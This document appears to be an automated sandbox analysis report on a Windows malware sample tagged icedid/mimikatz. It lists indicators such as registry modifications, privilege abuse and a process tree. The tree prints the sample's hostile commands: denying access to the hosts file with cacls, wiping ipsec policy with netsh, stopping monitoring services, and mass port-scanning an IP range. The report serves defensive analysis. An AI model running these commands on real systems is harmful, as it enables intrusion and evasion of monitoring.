netsh.exenet.execmd.exenetsh.exenet1.execmd.execmd.execmd.exePING.EXEcmd.execbftscrnu.execmd.exeschtasks.exeschtasks.exenetsh.execmd.execacls.execmd.exenetsh.execmd.exenet.exenet1.exenetsh.execmd.execacls.exenet1.exexohudmc.exetgkfgfrve.execacls.execmd.exesc.exenet1.exevarpws.execmd.exenet.exenet1.exenetsh.exenetsh.exenetsh.execmd.exesc.execacls.execmd.execmd.exenet.exenet.execmd.execmd.exenet1.exesc.exesc.exewpcap.exenet.exenetsh.exenetsh.execmd.exenet.exenet.execmd.execmlkkib.exenetsh.exenetsh.exenet1.execmd.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cbftscrnu.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xohudmc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tgkfgfrve.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language varpws.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wpcap.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmlkkib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
Processes:
PING.EXEcmd.exepid Process 2812 PING.EXE 4336 cmd.exe -
NSIS installer 3 IoCs
Processes:
resource yara_rule behavioral2/files/0x0007000000023c65-6.dat nsis_installer_2 behavioral2/files/0x0011000000023c79-15.dat nsis_installer_1 behavioral2/files/0x0011000000023c79-15.dat nsis_installer_2 -
Modifies data under HKEY_USERS 45 IoCs
Processes:
unnsehtzr.exeunnsehtzr.exeunnsehtzr.execmlkkib.exeunnsehtzr.exeunnsehtzr.exeunnsehtzr.exeunnsehtzr.exeunnsehtzr.exeunnsehtzr.exeunnsehtzr.exeunnsehtzr.exeunnsehtzr.exeunnsehtzr.exeunnsehtzr.exeunnsehtzr.exeunnsehtzr.exeunnsehtzr.exeunnsehtzr.exedescription ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" unnsehtzr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump unnsehtzr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" unnsehtzr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing cmlkkib.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" cmlkkib.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" unnsehtzr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump unnsehtzr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump unnsehtzr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump unnsehtzr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" cmlkkib.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump unnsehtzr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" unnsehtzr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" unnsehtzr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump unnsehtzr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" unnsehtzr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" unnsehtzr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" unnsehtzr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" unnsehtzr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump unnsehtzr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump unnsehtzr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump unnsehtzr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump unnsehtzr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing unnsehtzr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" unnsehtzr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump unnsehtzr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump unnsehtzr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" unnsehtzr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" unnsehtzr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" unnsehtzr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" cmlkkib.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump unnsehtzr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals unnsehtzr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" unnsehtzr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump unnsehtzr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ cmlkkib.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" cmlkkib.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump unnsehtzr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" unnsehtzr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump unnsehtzr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump unnsehtzr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" unnsehtzr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump unnsehtzr.exe Key created \REGISTRY\USER\.DEFAULT\Software unnsehtzr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" unnsehtzr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" unnsehtzr.exe -
Modifies registry class 14 IoCs
Processes:
cmlkkib.exedescription ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ cmlkkib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ cmlkkib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ cmlkkib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ cmlkkib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" cmlkkib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" cmlkkib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" cmlkkib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ cmlkkib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ cmlkkib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" cmlkkib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ cmlkkib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" cmlkkib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" cmlkkib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" cmlkkib.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exepid Process 4108 schtasks.exe 968 schtasks.exe 912 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
cmlkkib.exepid Process 4744 cmlkkib.exe 4744 cmlkkib.exe 4744 cmlkkib.exe 4744 cmlkkib.exe 4744 cmlkkib.exe 4744 cmlkkib.exe 4744 cmlkkib.exe 4744 cmlkkib.exe 4744 cmlkkib.exe 4744 cmlkkib.exe 4744 cmlkkib.exe 4744 cmlkkib.exe 4744 cmlkkib.exe 4744 cmlkkib.exe 4744 cmlkkib.exe 4744 cmlkkib.exe 4744 cmlkkib.exe 4744 cmlkkib.exe 4744 cmlkkib.exe 4744 cmlkkib.exe 4744 cmlkkib.exe 4744 cmlkkib.exe 4744 cmlkkib.exe 4744 cmlkkib.exe 4744 cmlkkib.exe 4744 cmlkkib.exe 4744 cmlkkib.exe 4744 cmlkkib.exe 4744 cmlkkib.exe 4744 cmlkkib.exe 4744 cmlkkib.exe 4744 cmlkkib.exe 4744 cmlkkib.exe 4744 cmlkkib.exe 4744 cmlkkib.exe 4744 cmlkkib.exe 4744 cmlkkib.exe 4744 cmlkkib.exe 4744 cmlkkib.exe 4744 cmlkkib.exe 4744 cmlkkib.exe 4744 cmlkkib.exe 4744 cmlkkib.exe 4744 cmlkkib.exe 4744 cmlkkib.exe 4744 cmlkkib.exe 4744 cmlkkib.exe 4744 cmlkkib.exe 4744 cmlkkib.exe 4744 cmlkkib.exe 4744 cmlkkib.exe 4744 cmlkkib.exe 4744 cmlkkib.exe 4744 cmlkkib.exe 4744 cmlkkib.exe 4744 cmlkkib.exe 4744 cmlkkib.exe 4744 cmlkkib.exe 4744 cmlkkib.exe 4744 cmlkkib.exe 4744 cmlkkib.exe 4744 cmlkkib.exe 4744 cmlkkib.exe 4744 cmlkkib.exe -
Suspicious behavior: LoadsDriver 15 IoCs
Processes:
pid Process 660 660 660 660 660 660 660 660 660 660 660 660 660 660 660 -
Suspicious behavior: RenamesItself 1 IoCs
Processes:
2024-10-22_a168b9ba655f69660067784207bb3308_hacktools_icedid_mimikatz.exepid Process 656 2024-10-22_a168b9ba655f69660067784207bb3308_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
Processes:
2024-10-22_a168b9ba655f69660067784207bb3308_hacktools_icedid_mimikatz.execmlkkib.execmlkkib.exevfshost.exeunnsehtzr.exegktgmq.exeunnsehtzr.exeunnsehtzr.exeunnsehtzr.exeunnsehtzr.exeunnsehtzr.exeunnsehtzr.exeunnsehtzr.exeunnsehtzr.exeunnsehtzr.exeunnsehtzr.exeunnsehtzr.exeunnsehtzr.exeunnsehtzr.exeunnsehtzr.exeunnsehtzr.exeunnsehtzr.exeunnsehtzr.exedescription pid Process Token: SeDebugPrivilege 656 2024-10-22_a168b9ba655f69660067784207bb3308_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 4156 cmlkkib.exe Token: SeDebugPrivilege 4744 cmlkkib.exe Token: SeDebugPrivilege 2856 vfshost.exe Token: SeDebugPrivilege 4868 unnsehtzr.exe Token: SeLockMemoryPrivilege 5088 gktgmq.exe Token: SeLockMemoryPrivilege 5088 gktgmq.exe Token: SeDebugPrivilege 3592 unnsehtzr.exe Token: SeDebugPrivilege 380 unnsehtzr.exe Token: SeDebugPrivilege 1908 unnsehtzr.exe Token: SeDebugPrivilege 4312 unnsehtzr.exe Token: SeDebugPrivilege 4724 unnsehtzr.exe Token: SeDebugPrivilege 4836 unnsehtzr.exe Token: SeDebugPrivilege 552 unnsehtzr.exe Token: SeDebugPrivilege 1320 unnsehtzr.exe Token: SeDebugPrivilege 3448 unnsehtzr.exe Token: SeDebugPrivilege 5100 unnsehtzr.exe Token: SeDebugPrivilege 4324 unnsehtzr.exe Token: SeDebugPrivilege 1548 unnsehtzr.exe Token: SeDebugPrivilege 3616 unnsehtzr.exe Token: SeDebugPrivilege 1500 unnsehtzr.exe Token: SeDebugPrivilege 1412 unnsehtzr.exe Token: SeDebugPrivilege 2772 unnsehtzr.exe Token: SeDebugPrivilege 444 unnsehtzr.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
Processes:
2024-10-22_a168b9ba655f69660067784207bb3308_hacktools_icedid_mimikatz.execmlkkib.execmlkkib.exexohudmc.exevarpws.execmlkkib.execmlkkib.exepid Process 656 2024-10-22_a168b9ba655f69660067784207bb3308_hacktools_icedid_mimikatz.exe 656 2024-10-22_a168b9ba655f69660067784207bb3308_hacktools_icedid_mimikatz.exe 4156 cmlkkib.exe 4156 cmlkkib.exe 4744 cmlkkib.exe 4744 cmlkkib.exe 2424 xohudmc.exe 824 varpws.exe 3160 cmlkkib.exe 3160 cmlkkib.exe 6132 cmlkkib.exe 6132 cmlkkib.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
2024-10-22_a168b9ba655f69660067784207bb3308_hacktools_icedid_mimikatz.execmd.execmlkkib.execmd.execmd.exewpcap.exenet.exenet.exenet.exedescription pid Process procid_target PID 656 wrote to memory of 4336 656 2024-10-22_a168b9ba655f69660067784207bb3308_hacktools_icedid_mimikatz.exe 84 PID 656 wrote to memory of 4336 656 2024-10-22_a168b9ba655f69660067784207bb3308_hacktools_icedid_mimikatz.exe 84 PID 656 wrote to memory of 4336 656 2024-10-22_a168b9ba655f69660067784207bb3308_hacktools_icedid_mimikatz.exe 84 PID 4336 wrote to memory of 2812 4336 cmd.exe 86 PID 4336 wrote to memory of 2812 4336 cmd.exe 86 PID 4336 wrote to memory of 2812 4336 cmd.exe 86 PID 4336 wrote to memory of 4156 4336 cmd.exe 93 PID 4336 wrote to memory of 4156 4336 cmd.exe 93 PID 4336 wrote to memory of 4156 4336 cmd.exe 93 PID 4744 wrote to memory of 1032 4744 cmlkkib.exe 95 PID 4744 wrote to memory of 1032 4744 cmlkkib.exe 95 PID 4744 wrote to memory of 1032 4744 cmlkkib.exe 95 PID 1032 wrote to memory of 4108 1032 cmd.exe 98 PID 1032 wrote to memory of 4108 1032 cmd.exe 98 PID 1032 wrote to memory of 4108 1032 cmd.exe 98 PID 1032 wrote to memory of 3676 1032 cmd.exe 99 PID 1032 wrote to memory of 3676 1032 cmd.exe 99 PID 1032 wrote to memory of 3676 1032 cmd.exe 99 PID 1032 wrote to memory of 2852 1032 cmd.exe 100 PID 1032 wrote to memory of 2852 1032 cmd.exe 100 PID 1032 wrote to memory of 2852 1032 cmd.exe 100 PID 1032 wrote to memory of 4752 1032 cmd.exe 101 PID 1032 wrote to memory of 4752 1032 cmd.exe 101 PID 1032 wrote to memory of 4752 1032 cmd.exe 101 PID 1032 wrote to memory of 2856 1032 cmd.exe 102 PID 1032 wrote to memory of 2856 1032 cmd.exe 102 PID 1032 wrote to memory of 2856 1032 cmd.exe 102 PID 1032 wrote to memory of 2408 1032 cmd.exe 103 PID 1032 wrote to memory of 2408 1032 cmd.exe 103 PID 1032 wrote to memory of 2408 1032 cmd.exe 103 PID 4744 wrote to memory of 1776 4744 cmlkkib.exe 107 PID 4744 wrote to memory of 1776 4744 cmlkkib.exe 107 PID 4744 wrote to memory of 1776 4744 cmlkkib.exe 107 PID 4744 wrote to memory of 3828 4744 cmlkkib.exe 109 PID 4744 wrote to memory of 3828 4744 cmlkkib.exe 109 PID 4744 wrote to memory of 3828 4744 cmlkkib.exe 109 PID 4744 wrote to memory of 1392 4744 cmlkkib.exe 111 PID 4744 wrote to memory of 1392 4744 cmlkkib.exe 111 PID 4744 wrote to memory of 1392 4744 cmlkkib.exe 111 PID 4744 wrote to memory of 1580 4744 cmlkkib.exe 117 PID 4744 wrote to memory of 1580 4744 cmlkkib.exe 117 PID 4744 wrote to memory of 1580 4744 cmlkkib.exe 117 PID 1580 wrote to memory of 3804 1580 cmd.exe 119 PID 1580 wrote to memory of 3804 1580 cmd.exe 119 PID 1580 wrote to memory of 3804 1580 cmd.exe 119 PID 3804 wrote to memory of 2700 3804 wpcap.exe 120 PID 3804 wrote to memory of 2700 3804 wpcap.exe 120 PID 3804 wrote to memory of 2700 3804 wpcap.exe 120 PID 2700 wrote to memory of 4380 2700 net.exe 122 PID 2700 wrote to memory of 4380 2700 net.exe 122 PID 2700 wrote to memory of 4380 2700 net.exe 122 PID 3804 wrote to memory of 4868 3804 wpcap.exe 123 PID 3804 wrote to memory of 4868 3804 wpcap.exe 123 PID 3804 wrote to memory of 4868 3804 wpcap.exe 123 PID 4868 wrote to memory of 1988 4868 net.exe 125 PID 4868 wrote to memory of 1988 4868 net.exe 125 PID 4868 wrote to memory of 1988 4868 net.exe 125 PID 3804 wrote to memory of 912 3804 wpcap.exe 126 PID 3804 wrote to memory of 912 3804 wpcap.exe 126 PID 3804 wrote to memory of 912 3804 wpcap.exe 126 PID 912 wrote to memory of 4752 912 net.exe 128 PID 912 wrote to memory of 4752 912 net.exe 128 PID 912 wrote to memory of 4752 912 net.exe 128 PID 3804 wrote to memory of 4420 3804 wpcap.exe 129
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:1788
-
C:\Windows\TEMP\zzuiitsrt\gktgmq.exe"C:\Windows\TEMP\zzuiitsrt\gktgmq.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5088
-
-
C:\Users\Admin\AppData\Local\Temp\2024-10-22_a168b9ba655f69660067784207bb3308_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-10-22_a168b9ba655f69660067784207bb3308_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:656 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\mnvzbkud\cmlkkib.exe2⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:4336 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2812
-
-
C:\Windows\mnvzbkud\cmlkkib.exeC:\Windows\mnvzbkud\cmlkkib.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4156
-
-
-
C:\Windows\mnvzbkud\cmlkkib.exeC:\Windows\mnvzbkud\cmlkkib.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4744 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- Suspicious use of WriteProcessMemory
PID:1032 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4108
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
PID:3676
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2852
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵PID:4752
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2856
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
PID:2408
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1776
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3828
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1392
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\vsjtbfmcn\nifklhuyf\wpcap.exe /S2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1580 -
C:\Windows\vsjtbfmcn\nifklhuyf\wpcap.exeC:\Windows\vsjtbfmcn\nifklhuyf\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3804 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2700 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵PID:4380
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4868 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
- System Location Discovery: System Language Discovery
PID:1988
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:912 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
- System Location Discovery: System Language Discovery
PID:4752
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
- System Location Discovery: System Language Discovery
PID:4420 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
- System Location Discovery: System Language Discovery
PID:1468
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:4372 -
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:2436 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵PID:3776
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:4448
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:1536 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:2708
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\vsjtbfmcn\nifklhuyf\cbftscrnu.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\vsjtbfmcn\nifklhuyf\Scant.txt2⤵PID:2816
-
C:\Windows\vsjtbfmcn\nifklhuyf\cbftscrnu.exeC:\Windows\vsjtbfmcn\nifklhuyf\cbftscrnu.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\vsjtbfmcn\nifklhuyf\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
